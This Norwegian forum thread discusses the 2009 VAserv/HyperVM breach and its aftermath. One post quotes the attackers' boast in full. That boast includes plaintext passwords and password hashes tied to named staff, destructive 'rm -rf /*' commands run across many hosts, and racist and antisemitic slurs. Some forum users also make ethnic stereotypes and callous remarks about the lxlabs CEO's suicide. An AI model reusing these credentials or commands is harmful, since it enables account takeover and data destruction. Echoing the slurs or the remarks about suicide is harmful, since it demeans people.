Innbrudd slettet 100 000 nettsider

[Noble]

Han må være japansk/kinesisk. De særingene tar livet sitt dersom de taper i lotto.

[Sokkalf™]

Har en VPS hos VAserv, som har vært oppe hele tiden, og fortsatt er oppe. Er vel en av de som har hatt flaks..

 

Backup er det ikke mange som har, men dette er jo ikke noen tabbe av VAserv, siden det produktet man kjøper ikke inkluderer backup. Selv ordner jeg backup på egenhånd, via rsync til en annen server.

[nebrewfoz]

Han må være japansk/kinesisk. De særingene tar livet sitt dersom de taper i lotto.

Må han?

(Han var faktisk indisk.)

 

[Dette er vel strengt tatt tema for en annen tråd, men hvordan ser hinduer (som tror på reinkarnasjon) på det å ta sitt eget liv? Blir det som køsniking?]

[G]

Det hadde vel vært bedre å emigrere enn å ta livet sitt.

[hobgoblin]

om noen vil ha flere detaljer så kan dere sjekke theregister artikkelen som er oppført som kilde...

[hobgoblin]

Du skal nok ikke se bort ifra at de hadde backup, men at denne også var virtuell.

http://ars.userfriendly.org/cartoons/?id=20060610

[ZyberZone]

Hehe, den var faktisk veldig bra

[Rackmount]

For å bli kvitt noen spekulasjoner.

lxlabs ble kontaktet for ganske lenge siden ang de sårbarheter som var oppdaget.

Les denne: http://www.milw0rm.com/exploits/8880

CEO i lxlabs, Ligesh(32) aka lxHelp http://forum.lxlabs.com/index.php?t=getfil...8&private=0 har i følge andre vært ganske opprørt over at hans søster og mor for noen år tilbake også tok sitt eget liv ved henging, og hadde nylig også tapt en stor kontrakt til et annet selskap(Rykter). Ligesh blir således nr.3 i fammilien som tar sitt liv på denne måten.

Det er spekulasjoner rundt lxlabs fremtid. S. Bhargava i lxlabs hadde i dag et møte med Ligesh far for å drøfte selskapets fremtid.

For de som har særinteresser av å følge saken: http://forum.lxlabs.com/index.php?t=msg&am...mp;start=0&

Vi bruker selv programmvaren til lxlabs og har testet for de nevnte sårbarheter, men klarer så langt ikke å se at det skal være noen hull etter siste oppdatering.

Det finnes heller ingen bevis på at det er nettopp disse sikkerhetshullene som er årsak til problemene hos vaserv.com. Jeg kjenner ikke til at noen har påtatt seg skylden for skaden så langt heller. Man kan jo spekulere i det meste i denne saken. Ligesh selv har vært meget aktiv på selskapets forum, og står etter sigende for det aller meste av kode i programmvaren lxadmin/Kloxo og hypervm.

[myhken]

Det er noen som har tatt på seg skylden for dette angrepet jo, og de har postet informasjon som viser at de virkelig har vært inne i systemet. Så det har vært en kombinasjon av sikkerhetsfeil i hyperVM og en hacker som har utnyttet dette.

 

 

Z3r0 day in hypervm?? plz u give us too much credit. If you really really wanna know how you got wtfpwned bitch it was ur own stupidity and excessive passwd reuse. Rus's passwds are

Code:

 

e2x2%sin0ei unf1shf4rt 3^%3df 1/2=%mod5 f0ster

 

f0ster being the latest one, quite secure eh bitches? We were in ur networks sniffing ur passwds for the past two months quite funny this openvz crap is we could just get into any VPS we like at any time thanks to ur mad passwds. But we got bored so we decided to initiate operation rmfication and hypervm was a great t00l to do that since it spared us the time of sshing into all ur 200 boxen just to issue rm -rf. Coded a little .pl to do just that, take a look at this eleet output it's mad dawg

Code:

 

[root@vz-vaserv .ssh]# perl h.pl -user admin -pass ****off -host cp.vaserv.com -cmd 'rm -rf /* 2> /dev/null > /dev/null &'

[+] Attempting to login using admin / ****off

[+] Logged in, showtime!

Output for 67.222.156.106

Output for xen3ws.vaserv.com

Output for vz22uk.vaserv.com

Output for xen4ws.vaserv.com

Output for vzspecial5.vaserv.com

Output for xen16.vaserv.com

Output for vz77uk.vaserv.com

Output for 91.186.26.128

Output for xen25.vaserv.com

Output for vz76uk.vaserv.com

Output for vz18tx.vaserv.com

Output for vz75uk.vaserv.com

Output for vz45uk.vaserv.com

Output for vzpent16.vaserv.com

Output for xen1tx.vaserv.com

Output for vz13tx.vaserv.com

Output for vz74uk.vaserv.com

Output for vzspecial8.vaserv.com

Output for xen24.vaserv.com

Output for vz73uk.vaserv.com

Output for rdns1.vaserv.com

Output for vz2tx.vaserv.com

Output for vz17tx.vaserv.com

Output for xen23.vaserv.com

Output for vz72uk.vaserv.com

Output for xen22.vaserv.com

Output for vzruffbuff.vaserv.com

Output for vzmario.vaserv.com

Output for xen21.vaserv.com

Output for vz71uk.vaserv.com

Output for vzspecial7.vaserv.com

Output for vz70uk.vaserv.com

Output for xen20.vaserv.com

Output for vz69uk.vaserv.com

Output for vzspecial6.vaserv.com

Output for vz7uk.vaserv.com

Output for vzspecial4.vaserv.com

Output for vzspecial3.vaserv.com

Output for xen19.vaserv.com

Output for vzspecial2.vaserv.com

Output for vzspecial1.vaserv.com

Output for vzpent3.vaserv.com

output truncated due to massive boxen outputz

[root@vz-vaserv .ssh]# rm -rf /* > /dev/null 2> /dev/null &

[1] 12399

[root@vz-vaserv .ssh]#

 

Did the same fo ****vps.com after resetting the passwd to hyper ve emz, it was ever so much fun you should try it sometime Rus it's GREAT!

BTW to all the customers we deleted ur loving provider is overselling their crappy 8gb nodez to hell and back, thought you'd like to know, you can also thank ur loving buddy Rus for losing ur data hihi. BTW Rus we still have ur billing system wtfpwned and baqdoored we got shitload of CCz from ur retarded customers thanks a lot buddy. Telling you this cuz we got bored of this ****, it's just too easy and monotonous so patch ur crap, if your too dumb to secure a simple web server my rate is $100/hour or one night with ur sister hauhaiahiaha.

Also wheres ur team Rus? the only ****ers i saw in ur billing sys are Kody, Vlada and u you guys work like ****ing hindus i bet but ur cheap like jews lolz hire some pros like me to help you out manage all those retards VPSs lolololl

Code:

 

1 1 rghf c32f3310baffcb431875a67196e99ebd Rus F [email protected] 0 ,

Edit Delete 3 1 vlada c32f3310baffcb431875a67196e99ebd Vlada Neskovic [email protected] 0 ,

Edit Delete 4 1 Kody fde67637d867c52d739931528dd92ef0 Kody Riker [email protected] Georgia - server22 space 1slot 1gb 0 ,

 

See we care about ur privacy and edited ur emailz unlike you who do not care about the privacy of ur retarded customers lol

Code:

 

Showing rows 0 - 29 (1,361 total, Query took 0.0133 sec)

SELECT *

FROM `tblclients`

LIMIT 0 , 30

 

Fun stuff think we gonna sell all those emails to some spammers to make some quick bucks lol, and yes their main site was a VPS lolol which is why we got quick access thanks to ur passwd reuse, your awesome Rus.

 

Yea yea "his IP is:64.79.210.78" here i saved u the trouble lolol

Code:

 

-bash-3.2# ifconfig

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

inet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:16271 errors:0 dropped:0 overruns:0 frame:0

TX packets:16271 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:1114930 (1.0 MiB) TX bytes:1114930 (1.0 MiB)

 

venet0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00

inet addr:127.0.0.1 P-t-P:127.0.0.1 Bcast:0.0.0.0 Mask:255.255.255.255

UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1

RX packets:33396 errors:0 dropped:0 overruns:0 frame:0

TX packets:34122 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:4462516 (4.2 MiB) TX bytes:11170841 (10.6 MiB)

 

venet0:0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00

inet addr:64.79.210.78 P-t-P:64.79.210.78 Bcast:64.79.210.78 Mask:255.255.255.255

UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1

 

venet0:1 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00

inet addr:64.79.206.197 P-t-P:64.79.206.197 Bcast:64.79.206.197 Mask:255.255.255.255

UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1

 

venet0:2 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00

inet addr:67.223.225.52 P-t-P:67.223.225.52 Bcast:67.223.225.52 Mask:255.255.255.255

UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1

 

-bash-3.2# rm -rf /* 2> /dev/null > /dev/null * &

[1] 7643

-bash-3.2#

 

I love to rm lol bye

 

~Thedefaced.org

 

 

Jeg har brukt vaserv i lang tid, men etter at jeg fikk et veldig bra tilbud fra en annen leverandør kuttet jeg ut serveren jeg hadde hos vaserv for et par måneder siden. Og det ser jo ikke ut som var en helt dum avgjørelse.

 

Håper de kommer seg over denne kneika og fortsetter å levere VPS løsninger til en rimlig penge. Slike angrep som dette er nok til å få et selskap til å gå under. Spesielt når de satser på lavpris segmentet.

 

Det med backup er som nevnt her i tråden kundens eget ansvar for alle som hadde tjenester fra cheapvps.co.uk og fsckvps.com. Disse tjeneste er "unamanged" og backup er ikke en del av tjenesten der. De som hadde tjenester fra A2B2.com skulle i prinsippet hatt backup..

Men uansett, man er ganske dum om man har viktige nettsteder uten egen backup. Da ber man jo om problemer.

 

Synd at det er så mange som må gå på en skikkelig smell før de lærer å ta egne backuper og ikke stole på at alle andre fikser dette for dem.

[genstian]

Vel, mista VPSen min. Selv backupene som var lagret på deres systemer ble slettet og hackerne skal visst ha fått med kredittkort opplysningene til kundene hos fsckvps.

 

Uansett synes de fleste kundene at 2mnd gratis tjeneste hos dem er ganske greit hvis de mistet data, og dem som fikk nedtid 1mnd. Desverre flytter jeg heller mine data til en dedikert server.

 

Er det foresten noen som vet om BlueSquare har kjøpt opp vaserv?

[Rackmount]

Er det foresten noen som vet om BlueSquare har kjøpt opp vaserv?

 

Så vidt jeg vet overtok de hele greiene ja.

[Rackmount]

Det er noen som har tatt på seg skylden for dette angrepet jo, og de har postet informasjon som viser at de virkelig har vært inne i systemet. Så det har vært en kombinasjon av sikkerhetsfeil i hyperVM og en hacker som har utnyttet dette.

 

Lurer litt på hva motivasjonen til hackerne er. Cred ?

Håper han/hun blir tatt og straffet hardt.

 

Synd at det er så mange som må gå på en skikkelig smell før de lærer å ta egne backuper og ikke stole på at alle andre fikser dette for dem.

 

Vi bruker både lxadmin og hypervm, og stengte ned kundenes tilgang til kontrollpanelet. Vi har patchet opp det vi kan, men ønsker å gjøre en del testing før vi anser det som trygt å slippe inn kundene igjen. Det aller meste kan uansett gjøres via billingsystemet.

Vi har selv kunder som ikke kjøper tjensten backup, men vi tar uavhengig av dette full backup til tape uansett. Eneste er at de kundene uten avtale om backup må betale så det svir dersom de som følge av egen dummhet får slettet sine data og ønsker en restore.

[Rackmount]

For de interesserte har nå følgende kommet ut.

 

Hello,

 

Today I had discussion with Ligesh's family. From the discussion it is appears that Lxlabs will not continue to run the business.

 

They are considering, releasing the software Kloxo and Hypervm under an Opensource license.

 

I will be keep you posted

 

Thanks and Regards

 

S Bhargava

Lxlabs Support

 

 

Det gleder meg stort dersom prosjektet blir Open Source

[genstian]

Synes nesten at det er positivt at han tok selvmord da.

 

Forøverig så var motivasjonen til hackeren (som han nevnte i samme post som detaljene rundt angrepet) var å vise at folk/lxlabs ikke brydde seg om å oppdatere systemet. Han hadde allerede lagt ved en bugrapport, men feilen hadde ikke blitt rettet på 2 uke.